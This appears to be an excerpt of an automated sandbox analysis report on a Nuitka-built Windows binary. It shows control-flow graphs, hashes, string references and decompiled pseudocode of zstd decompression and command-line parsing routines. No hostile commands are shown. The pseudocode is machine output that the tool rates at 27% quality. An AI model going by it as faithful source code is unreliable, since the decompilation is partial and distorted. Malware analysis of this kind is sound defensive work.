                                                                                                                                                                control_flow_graph 580 402c00-402c60 581 402c66-402c6b 580->581 582 402f6e-402f82 _assert 580->582 583 402c71-402c7d 581->583 584 402f4f-402f63 _assert 581->584 585 402f8d-402fa9 _assert 582->585 586 402f30-402f44 _assert 583->586 587 402c83-402cc6 583->587 584->582 588 403108-403112 585->588 589 402faf-402fb5 585->589 586->584 590 4030d1-4030e6 587->590 591 402ccc-402ce7 587->591 596 402fc6-402fe7 588->596 597 403118 588->597 592 402fbb 589->592 593 402d6f-402d79 589->593 594 403038-403042 590->594 595 4030ec-403102 _assert 590->595 598 402d19-402d23 591->598 601 402dc1-402dc7 592->601 602 402d80-402d8c 593->602 604 403044-403047 594->604 605 4030ad-4030ca _assert 594->605 595->588 603 402fea-403004 596->603 597->594 599 402cf0-402d05 598->599 600 402d25-402d41 598->600 606 402d0b-402d17 599->606 607 402e7e-402ea1 _assert 599->607 600->598 608 402d43-402d61 600->608 615 402e6d-402e7d 601->615 616 402dcd-402e01 601->616 611 402db0-402db7 602->611 612 402d8e 602->612 613 403006 603->613 614 40301f-40302c 603->614 610 40304d-40304f 604->610 604->615 609 4030cc 605->609 605->610 606->598 606->608 628 402eb0-402eeb 607->628 608->585 618 402d67-402d69 608->618 609->615 617 403051-403083 610->617 611->602 623 402db9-402dbb 611->623 619 402d90-402d97 612->619 620 403010-40301d 613->620 621 403033 614->621 622 40302e-403031 614->622 624 402e08-402e1c 616->624 617->617 627 403085-403088 617->627 618->593 629 402fc0-402fc4 618->629 630 402da0-402da6 619->630 620->614 620->620 621->594 622->603 623->601 631 402f11-402f25 _assert 623->631 625 402e22-402e4c 624->625 626 402ef6-402f0c _assert 624->626 625->628 632 402e4e-402e6b 625->632 626->625 627->616 633 40308e-4030a8 _assert 627->633 628->624 636 402ef1 628->636 629->596 630->630 634 402da8-402dae 630->634 631->586 632->615 632->624 633->616 634->611 634->619 636->615
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$maxSymbolValue <= MaxSeq$nbAdditionalBits[symbol] < 255$normalizedCounter[s]>=0$position == 0$tableLog <= MaxFSELog$tableSize % unroll == 0$tableSize <= 512$val != 0$wkspSize >= ZSTD_BUILD_FSE_TABLE_WKSP_SIZE
                                                                                                                                                                • API String ID: 1222420520-173631386
                                                                                                                                                                • Opcode ID: ad47579f494587566aff32373c93c7d0e27b533bfb7843c7e68bf111f6fc8825
                                                                                                                                                                • Instruction ID: 4f4a2220f8d72b58ed86939e9b3b2351b714ed2b175e2251c63103eb1adcf219
                                                                                                                                                                • Opcode Fuzzy Hash: ad47579f494587566aff32373c93c7d0e27b533bfb7843c7e68bf111f6fc8825
                                                                                                                                                                • Instruction Fuzzy Hash: 96C1237231569187DB20CF15E94879E7721F794B84F85812AEF4913BD8EBBCC949CB08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 741 41dcf0-41dd0f 742 41dd15-41dd1b 741->742 743 41dde8-41ddfe 741->743 744 41dd40-41dd44 742->744 745 41dd20-41dd23 744->745 746 41dd46-41dd49 744->746 747 41dd29-41dd2c 745->747 748 41ddc8-41ddcb 745->748 749 41de00-41de14 746->749 750 41dd4f-41dd6d _wcsicmp 746->750 751 41dd30-41dd3a 747->751 754 41ddb4-41ddc2 748->754 755 41ddcd-41dde2 748->755 749->751 752 41dd73-41dd84 _wcsicmp 750->752 753 41deb8-41dec3 GetTempPathW 750->753 751->743 751->744 756 41dec8-41dee9 GetCommandLineW CommandLineToArgvW 752->756 757 41dd8a-41dd9b _wcsicmp 752->757 758 41de70-41de74 753->758 755->743 755->744 763 41deeb 756->763 764 41defe-41df06 756->764 761 41dda1-41ddb2 _wcsicmp 757->761 762 41de80-41deb0 GetCurrentProcessId call 402370 call 41dbf0 757->762 759 41de76-41de78 758->759 760 41de68-41de6c 758->760 759->751 760->758 761->754 768 41de20-41de60 GetSystemTimeAsFileTime call 402370 call 41dbf0 761->768 762->758 769 41def0-41defc 763->769 765 41df33-41df38 764->765 766 41df08-41df0b 764->766 765->758 771 41df19-41df31 766->771 772 41df0d-41df3d 766->772 768->758 769->764 769->769 771->765 776 41df10-41df13 771->776 779 42647a-426485 abort * 2 772->779 776->771 776->779 783 426490 779->783 783->783
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                • String ID: %lld$PID$PROGRAM$TEMP$TIME
                                                                                                                                                                • API String ID: 2081463915-209724506
                                                                                                                                                                • Opcode ID: 73fa149ae4d25ec62c3c218f9009c7d8b6c79d5166027912828323f79d2f2ed6
                                                                                                                                                                • Instruction ID: 3f6ca52b6ec2d5889901236797f371f7673c8e2c76762d6726aabd6e38623750
                                                                                                                                                                • Opcode Fuzzy Hash: 73fa149ae4d25ec62c3c218f9009c7d8b6c79d5166027912828323f79d2f2ed6
                                                                                                                                                                • Instruction Fuzzy Hash: 5F51C1E6B2076181EF25AF21A9017FA6261BB54BC5FD49027DE0A4B754EB3CC986C30D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 841 402040-4020a1 842 4020a7-4020b2 841->842 843 40223d-402250 841->843 842->843 844 4020b8-40210c 842->844 845 40212f-402138 844->845 846 402110-40212a 845->846 847 40213a-402154 845->847 848 402156-402159 846->848 849 40212c 846->849 847->848 847->849 850 40216b-40217b 848->850 851 40215b-402167 848->851 849->845 852 402181-402186 850->852 853 40227e-40229b 850->853 851->850 854 402190-40219d 852->854 855 40229e-4022b7 853->855 856 4021c0-4021c7 854->856 857 40219f 854->857 858 4022b9 855->858 859 4022cf-4022dc 855->859 860 4021c9-4021cc 856->860 861 4021ce-4021d9 856->861 862 4021a0-4021a8 857->862 863 4022c0-4022cd 858->863 859->855 864 4022de-4022ed 859->864 860->854 861->843 865 4021db-402201 861->865 866 4021b0-4021b6 862->866 863->859 863->863 867 402309-40230b 864->867 868 4022ef-402303 _assert 864->868 870 402208-40221c 865->870 866->866 871 4021b8-4021be 866->871 869 40230d-40233e 867->869 868->867 869->869 872 402340-402343 869->872 873 402251-402277 _assert 870->873 874 40221e-402238 870->874 871->856 871->862 872->865 875 402349-402363 _assert 872->875 873->870 877 402279-40227c 873->877 874->870 876 40223a 874->876 875->865 876->843 877->843
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • position == 0, xrefs: 00402356
                                                                                                                                                                • val != 0, xrefs: 0040225E
                                                                                                                                                                • tableSize % unroll == 0, xrefs: 004022FC
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/fse_decompress.c, xrefs: 004022F5, 0040234F
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00402257
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/fse_decompress.c$position == 0$tableSize % unroll == 0$val != 0
                                                                                                                                                                • API String ID: 1222420520-682188271
                                                                                                                                                                • Opcode ID: b51fe0d72fa06ffdb6a5f565e59db979274a7a3eb5dba48222efb4dfc2a78d5d
                                                                                                                                                                • Instruction ID: 408338ec6870eaed148d99f30d10b2b0f8cf0027a57d2f6e58b057d98de810db
                                                                                                                                                                • Opcode Fuzzy Hash: b51fe0d72fa06ffdb6a5f565e59db979274a7a3eb5dba48222efb4dfc2a78d5d
                                                                                                                                                                • Instruction Fuzzy Hash: 9A8141723146A186DB24CF29D9407AE3761F388B98F84C226EF9A237D4EB7DC955C704
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 896 409f80-409fc9 897 40a14d 896->897 898 409fcf-40a02a 896->898 900 40a160-40a180 897->900 899 40a030-40a035 898->899 901 40a3e0-40a407 899->901 902 40a03b-40a03e 899->902 907 40a5d3-40a5d9 900->907 908 40a186 900->908 905 40a189-40a18c 901->905 906 40a40d 901->906 903 40a410-40a416 902->903 904 40a044-40a055 902->904 916 40a450-40a487 903->916 904->900 909 40a05b-40a092 904->909 910 40a3c0-40a3d4 _assert 905->910 911 40a192-40a1cd 905->911 906->903 908->905 912 40a094-40a0a2 909->912 913 40a0df-40a0e2 909->913 910->901 914 40a1d3-40a23a 911->914 915 40a318-40a3ba _assert 911->915 917 40a2b8-40a2d4 912->917 918 40a0a8-40a0ab 912->918 920 40a5a0-40a5a5 913->920 921 40a0e8-40a0ff 913->921 914->899 919 40a240-40a24b 914->919 915->910 922 40a490-40a4cf _assert 916->922 917->913 925 40a2da-40a2dd 917->925 918->913 923 40a0ad-40a0bd 918->923 931 40a258-40a275 919->931 926 40a144-40a147 920->926 927 40a5ab-40a5b3 920->927 921->916 924 40a105 921->924 922->922 928 40a4d1-40a4eb 922->928 930 40a0c3-40a0da 923->930 923->931 932 40a108-40a132 924->932 933 40a280-40a2a9 925->933 934 40a2df 925->934 926->897 937 40a568-40a575 926->937 935 40a511-40a532 927->935 936 40a5b9-40a5c5 927->936 928->926 938 40a4f1-40a50c 928->938 930->913 931->913 942 40a27b-40a27e 931->942 932->932 945 40a134-40a13e 932->945 933->913 944 40a2af-40a2b2 933->944 946 40a2e0-40a30c _assert 934->946 939 40a590-40a59a 935->939 940 40a534-40a537 935->940 936->938 937->897 943 40a57b 937->943 938->935 939->926 940->926 947 40a53d-40a546 940->947 942->933 942->946 943->939 944->917 944->918 945->926 945->935 946->933 949 40a5ca-40a5ce 947->949 950 40a54c-40a557 947->950 949->926 950->897 951 40a55d 950->951 951->937
                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                			E00409F80(void* __eax, void* __rbx, void* __rcx, void* __rdx, void* __r8, void* __r14) {
                                                                                                                                                                				void* _t113;
                                                                                                                                                                				void* _t140;
                                                                                                                                                                				void* _t142;
                                                                                                                                                                
                                                                                                                                                                				_t113 = __eax;
                                                                                                                                                                				 *((long long*)(_t142 + 0x40)) = __rdx + (( *(_t140 + 6) & 0x000000ff) << 0x30) + (( *(_t140 + 5) & 0x000000ff) << 0x28) + (( *(_t140 + 4) & 0x000000ff) << 0x20) + (( *(_t140 + 3) & 0x000000ff) << 0x18) + (( *(_t140 + 2) & 0x000000ff) << 0x10) + (( *(_t140 + 1) & 0x000000ff) << 8);
                                                                                                                                                                				if(__eax != 0) {
                                                                                                                                                                					__rdx = __al & 0x000000ff;
                                                                                                                                                                					__rax = 0x9;
                                                                                                                                                                					asm("enter 0x0, 0x0");
                                                                                                                                                                					__rsi =  *((intOrPtr*)(__rsp + 0xe0));
                                                                                                                                                                					__eax = __eax - r9d;
                                                                                                                                                                					asm("bsr edx, edx");
                                                                                                                                                                					__rax = 0x9 << 3;
                                                                                                                                                                					__rdi = __rdi + __rbx;
                                                                                                                                                                					r12d =  *( *((intOrPtr*)(__rsp + 0xe0)) + 2) & 0x000000ff;
                                                                                                                                                                					__rsi = __rbp;
                                                                                                                                                                					__rax = (0x9 << 3) - (__al & 0x000000ff);
                                                                                                                                                                					 *((long long*)(__rsp + 0x20)) = __rdi;
                                                                                                                                                                					__rdi =  *((intOrPtr*)(__rsp + 0xe0));
                                                                                                                                                                					 *(__rsp + 0x48) = 0x9;
                                                                                                                                                                					__rdi =  *((intOrPtr*)(__rsp + 0xe0)) + 4;
                                                                                                                                                                					r9d = r12d;
                                                                                                                                                                					 *(__rsp + 0x28) = __r14;
                                                                                                                                                                					__r14 = __rbp;
                                                                                                                                                                					__rbp = __rsi;
                                                                                                                                                                					r9d =  ~r9d;
                                                                                                                                                                					r9d = r9d & 0x0000003f;
                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                					do {
                                                                                                                                                                						if( *(__rsp + 0x28) <= __rbp) {
                                                                                                                                                                							__rdx = __rax;
                                                                                                                                                                							__rax = __rax & 0x00000007;
                                                                                                                                                                							__rdx = __rdx >> 3;
                                                                                                                                                                							 *(__rsp + 0x48) = __rax;
                                                                                                                                                                							r15d = __eax;
                                                                                                                                                                							__rax =  *((intOrPtr*)(__rsp + 0x20));
                                                                                                                                                                							__rbp = __rbp - __rdx;
                                                                                                                                                                							__r13 =  *__rbp;
                                                                                                                                                                							__rax =  *((intOrPtr*)(__rsp + 0x20)) - 7;
                                                                                                                                                                							 *(__rsp + 0x40) = __r13;
                                                                                                                                                                							if(__rbx <  *((intOrPtr*)(__rsp + 0x20)) - 7) {
                                                                                                                                                                								L22:
                                                                                                                                                                								if(r12d == 0) {
                                                                                                                                                                									r8d = 0x175;
                                                                                                                                                                									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                									__rcx = "nbBits >= 1";
                                                                                                                                                                									__imp___assert();
                                                                                                                                                                								}
                                                                                                                                                                								__r13 = __r13 << __cl;
                                                                                                                                                                								__rcx = __rsi;
                                                                                                                                                                								__rax = __r13 << __cl >> __cl;
                                                                                                                                                                								__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
                                                                                                                                                                								__rax =  *__rdx & 0x0000ffff;
                                                                                                                                                                								 *__rbx = __ax;
                                                                                                                                                                								__rax =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                								r15d = r15d + __eax;
                                                                                                                                                                								__rax =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                								__r13 = __r13 << __cl;
                                                                                                                                                                								__rcx = __rsi;
                                                                                                                                                                								__rbx = __rbx + __rax;
                                                                                                                                                                								__rdx = __r13 << __cl >> __cl;
                                                                                                                                                                								__r11 = __rdi + (__r13 << __cl >> __cl) * 4;
                                                                                                                                                                								if(r12d == 0) {
                                                                                                                                                                									__r10 = __imp___assert;
                                                                                                                                                                									 *(__rsp + 0x38) = __r11;
                                                                                                                                                                									r8d = 0x175;
                                                                                                                                                                									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                									__rcx = "nbBits >= 1";
                                                                                                                                                                									 *(__rsp + 0x30) = __r10;
                                                                                                                                                                									__eax =  *__r10();
                                                                                                                                                                									__r11 =  *(__rsp + 0x38);
                                                                                                                                                                									__r10 =  *(__rsp + 0x30);
                                                                                                                                                                									r8d = 0x175;
                                                                                                                                                                									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                									__rcx = "nbBits >= 1";
                                                                                                                                                                									__eax =  *__r11 & 0x0000ffff;
                                                                                                                                                                									 *__rbx = __ax;
                                                                                                                                                                									__eax = __r11[1] & 0x000000ff;
                                                                                                                                                                									r15d = r15d + (__r11[1] & 0x000000ff);
                                                                                                                                                                									__eax = __r11[1] & 0x000000ff;
                                                                                                                                                                									__rbx = __rbx + __rax;
                                                                                                                                                                									__eax =  *( *(__rsp + 0x30))();
                                                                                                                                                                									__rax = __r13;
                                                                                                                                                                									__r10 =  *(__rsp + 0x30);
                                                                                                                                                                									__rax = __r13 << __cl;
                                                                                                                                                                									__rcx = __rsi;
                                                                                                                                                                									r8d = 0x175;
                                                                                                                                                                									__rax = __r13 << __cl >> __cl;
                                                                                                                                                                									__rcx = "nbBits >= 1";
                                                                                                                                                                									__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
                                                                                                                                                                									__rax =  *__rdx & 0x0000ffff;
                                                                                                                                                                									 *__rbx = __ax;
                                                                                                                                                                									__rax =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                									r15d = r15d + (__r11[1] & 0x000000ff);
                                                                                                                                                                									__rax =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                									__rbx = __rbx + __rax;
                                                                                                                                                                									__eax =  *( *(__rsp + 0x30))();
                                                                                                                                                                								} else {
                                                                                                                                                                									__eax =  *__r11 & 0x0000ffff;
                                                                                                                                                                									__rdx = __r13;
                                                                                                                                                                									 *__rbx = __ax;
                                                                                                                                                                									__eax = __r11[1] & 0x000000ff;
                                                                                                                                                                									r15d = r15d + (__r11[1] & 0x000000ff);
                                                                                                                                                                									__eax = __r11[1] & 0x000000ff;
                                                                                                                                                                									__rdx = __r13 << __cl;
                                                                                                                                                                									__rcx = __rsi;
                                                                                                                                                                									__rbx = __rbx + __rax;
                                                                                                                                                                									__rdx = __r13 << __cl >> __cl;
                                                                                                                                                                									__rdx = __rdi + (__r13 << __cl >> __cl) * 4;
                                                                                                                                                                									__rax =  *__rdx & 0x0000ffff;
                                                                                                                                                                									 *__rbx = __ax;
                                                                                                                                                                									__rax =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                									r15d = r15d + __eax;
                                                                                                                                                                									__rax =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                									__rbx = __rbx + ( *(__rdx + 3) & 0x000000ff);
                                                                                                                                                                								}
                                                                                                                                                                								goto L25;
                                                                                                                                                                							}
                                                                                                                                                                							L39:
                                                                                                                                                                							__rsi = __rbp;
                                                                                                                                                                							__rbp = __r14;
                                                                                                                                                                							__r14 =  *(__rsp + 0x28);
                                                                                                                                                                							L8:
                                                                                                                                                                							__rax =  *((intOrPtr*)(__rsp + 0x20));
                                                                                                                                                                							__rcx =  *(__rsp + 0x48);
                                                                                                                                                                							__r9 = __rax - 2;
                                                                                                                                                                							if(__rcx > 0x40) {
                                                                                                                                                                								L13:
                                                                                                                                                                								if(__r9 < __rbx) {
                                                                                                                                                                									if( *((intOrPtr*)(__rsp + 0x20)) <= __rbx) {
                                                                                                                                                                										L18:
                                                                                                                                                                										if(__rbp == __rsi) {
                                                                                                                                                                											__r8 =  *((intOrPtr*)(__rsp + 0xc8));
                                                                                                                                                                											if( *(__rsp + 0x48) != 0x40) {
                                                                                                                                                                												goto L19;
                                                                                                                                                                											}
                                                                                                                                                                											goto L1;
                                                                                                                                                                										}
                                                                                                                                                                										goto L19;
                                                                                                                                                                									}
                                                                                                                                                                									__r14 =  *(__rsp + 0x40);
                                                                                                                                                                									if(r12d != 0) {
                                                                                                                                                                										L44:
                                                                                                                                                                										__rdx =  *(__rsp + 0x48);
                                                                                                                                                                										__r10 = __r14;
                                                                                                                                                                										__rcx = __rdx;
                                                                                                                                                                										__r10 = __r14 << __cl;
                                                                                                                                                                										__rcx =  ~__rdx;
                                                                                                                                                                										__r10 = __r14 << __cl >> __cl;
                                                                                                                                                                										__rax = __rdi + (__r14 << __cl >> __cl) * 4;
                                                                                                                                                                										__rcx =  *__rax & 0x000000ff;
                                                                                                                                                                										 *__rbx = __cl;
                                                                                                                                                                										if( *(__rax + 3) == 1) {
                                                                                                                                                                											 *(__rsp + 0x48) = __rdx;
                                                                                                                                                                											goto L18;
                                                                                                                                                                										}
                                                                                                                                                                										if(__rdx > 0x3f) {
                                                                                                                                                                											goto L18;
                                                                                                                                                                										}
                                                                                                                                                                										__rdx = __rdx + __rax;
                                                                                                                                                                										if(__rdx <= 0x40) {
                                                                                                                                                                											 *(__rsp + 0x48) = __rdx;
                                                                                                                                                                											goto L18;
                                                                                                                                                                										}
                                                                                                                                                                										__r8 =  *((intOrPtr*)(__rsp + 0xc8));
                                                                                                                                                                										if(__rbp != __rsi) {
                                                                                                                                                                											goto L19;
                                                                                                                                                                										}
                                                                                                                                                                										goto L1;
                                                                                                                                                                									}
                                                                                                                                                                									__rax = __imp___assert;
                                                                                                                                                                									 *(__rsp + 0x38) = __imp___assert;
                                                                                                                                                                									L43:
                                                                                                                                                                									__rax =  *(__rsp + 0x38);
                                                                                                                                                                									r8d = 0x175;
                                                                                                                                                                									__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                									__rcx = "nbBits >= 1";
                                                                                                                                                                									__eax =  *( *(__rsp + 0x38))();
                                                                                                                                                                									__r14 =  *(__rsp + 0x40);
                                                                                                                                                                									goto L44;
                                                                                                                                                                								}
                                                                                                                                                                								r11d = r12d;
                                                                                                                                                                								__r14 =  *(__rsp + 0x40);
                                                                                                                                                                								r15d =  *(__rsp + 0x48);
                                                                                                                                                                								r11d =  ~r11d;
                                                                                                                                                                								r11d = r11d & 0x0000003f;
                                                                                                                                                                								if(r12d == 0) {
                                                                                                                                                                									__rax = __imp___assert;
                                                                                                                                                                									 *(__rsp + 0x28) = r12d;
                                                                                                                                                                									__r13 = "nbBits >= 1";
                                                                                                                                                                									__r12 = __r9;
                                                                                                                                                                									 *(__rsp + 0x30) = __rsi;
                                                                                                                                                                									__r15 = __r14;
                                                                                                                                                                									r14d = r11d;
                                                                                                                                                                									 *(__rsp + 0x38) = __rax;
                                                                                                                                                                									 *(__rsp + 0xd0) = __rbp;
                                                                                                                                                                									__rbp = __rbx;
                                                                                                                                                                									__rbx = __rax;
                                                                                                                                                                									asm("o16 nop [eax+eax]");
                                                                                                                                                                									do {
                                                                                                                                                                										__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                										__rcx = __r13;
                                                                                                                                                                										r8d = 0x175;
                                                                                                                                                                										__eax =  *__rbx();
                                                                                                                                                                										__rcx = __rsi;
                                                                                                                                                                										__r15 = __r15 << __cl;
                                                                                                                                                                										__rdx = __r15 << __cl >> __cl;
                                                                                                                                                                										__rdx = __rdi + (__r15 << __cl >> __cl) * 4;
                                                                                                                                                                										__rcx =  *__rdx & 0x0000ffff;
                                                                                                                                                                										 *__rbp = __cx;
                                                                                                                                                                										__rcx =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                										__rdx =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                										__rsi = __rsi + __rcx;
                                                                                                                                                                										__rbp = __rbp + __rdx;
                                                                                                                                                                										 *(__rsp + 0x48) = __rsi;
                                                                                                                                                                									} while (__r12 >= __rbp);
                                                                                                                                                                									__rbx = __rbp;
                                                                                                                                                                									r12d =  *(__rsp + 0x28);
                                                                                                                                                                									__rsi =  *(__rsp + 0x30);
                                                                                                                                                                									__rbp =  *(__rsp + 0xd0);
                                                                                                                                                                									if( *((intOrPtr*)(__rsp + 0x20)) <= __rbx) {
                                                                                                                                                                										goto L18;
                                                                                                                                                                									}
                                                                                                                                                                									goto L43;
                                                                                                                                                                								}
                                                                                                                                                                								do {
                                                                                                                                                                									__r14 = __r14 << __cl;
                                                                                                                                                                									__rax = __r14 << __cl >> __cl;
                                                                                                                                                                									__rax = __rdi + (__r14 << __cl >> __cl) * 4;
                                                                                                                                                                									__rdx =  *__rax & 0x0000ffff;
                                                                                                                                                                									 *__rbx = __dx;
                                                                                                                                                                									__rdx =  *(__rax + 2) & 0x000000ff;
                                                                                                                                                                									__rax =  *(__rax + 3) & 0x000000ff;
                                                                                                                                                                									r15d = r15d + __edx;
                                                                                                                                                                									__rbx = __rbx + __rax;
                                                                                                                                                                								} while (__rbx <= __r9);
                                                                                                                                                                								 *(__rsp + 0x48) = r15d;
                                                                                                                                                                								if( *((intOrPtr*)(__rsp + 0x20)) > __rbx) {
                                                                                                                                                                									goto L44;
                                                                                                                                                                								}
                                                                                                                                                                								goto L18;
                                                                                                                                                                							}
                                                                                                                                                                							__eax = r12d;
                                                                                                                                                                							__rax = __rax & 0x0000003f;
                                                                                                                                                                							r13d = r12d;
                                                                                                                                                                							if(__r14 <= __rsi) {
                                                                                                                                                                								L31:
                                                                                                                                                                								__rcx = __rcx >> 3;
                                                                                                                                                                								__rsi = __rsi - (__rcx >> 3);
                                                                                                                                                                								__rax = __rcx;
                                                                                                                                                                								__r15 =  *__rsi;
                                                                                                                                                                								__rax = __rcx & 0x00000007;
                                                                                                                                                                								 *(__rsp + 0x48) = __rax;
                                                                                                                                                                								 *(__rsp + 0x40) = __r15;
                                                                                                                                                                								if(__rbx > __r9) {
                                                                                                                                                                									goto L13;
                                                                                                                                                                								}
                                                                                                                                                                								if(r12d != 0) {
                                                                                                                                                                									L29:
                                                                                                                                                                									__rcx = __rax;
                                                                                                                                                                									__r15 = __r15 << __cl;
                                                                                                                                                                									__rdx = __rdi + __r15 * 4;
                                                                                                                                                                									__rcx =  *__rdx & 0x0000ffff;
                                                                                                                                                                									 *__rbx = __cx;
                                                                                                                                                                									__rcx =  *(__rdx + 2) & 0x000000ff;
                                                                                                                                                                									__rcx = ( *(__rdx + 2) & 0x000000ff) + __rax;
                                                                                                                                                                									__rax =  *(__rdx + 3) & 0x000000ff;
                                                                                                                                                                									 *(__rsp + 0x48) = __rcx;
                                                                                                                                                                									__rbx = __rbx + ( *(__rdx + 3) & 0x000000ff);
                                                                                                                                                                									if(__rcx > 0x40) {
                                                                                                                                                                										goto L13;
                                                                                                                                                                									}
                                                                                                                                                                									if(__r14 > __rsi) {
                                                                                                                                                                										goto L10;
                                                                                                                                                                									}
                                                                                                                                                                									goto L31;
                                                                                                                                                                								}
                                                                                                                                                                								L34:
                                                                                                                                                                								 *(__rsp + 0x30) = __r9;
                                                                                                                                                                								r8d = 0x175;
                                                                                                                                                                								__rdx = "C:\\Users\\mac\\Desktop\\STINK-~1.0\\STINK-~1.0\\venv\\lib\\SITE-P~1\\nuitka\\build\\inline_copy\\zstd/common/bitstream.h";
                                                                                                                                                                								__rcx = "nbBits >= 1";
                                                                                                                                                                								 *(__rsp + 0x28) = __rax;
                                                                                                                                                                								__imp___assert();
                                                                                                                                                                								__r9 =  *(__rsp + 0x30);
                                                                                                                                                                								__rax =  *(__rsp + 0x28);
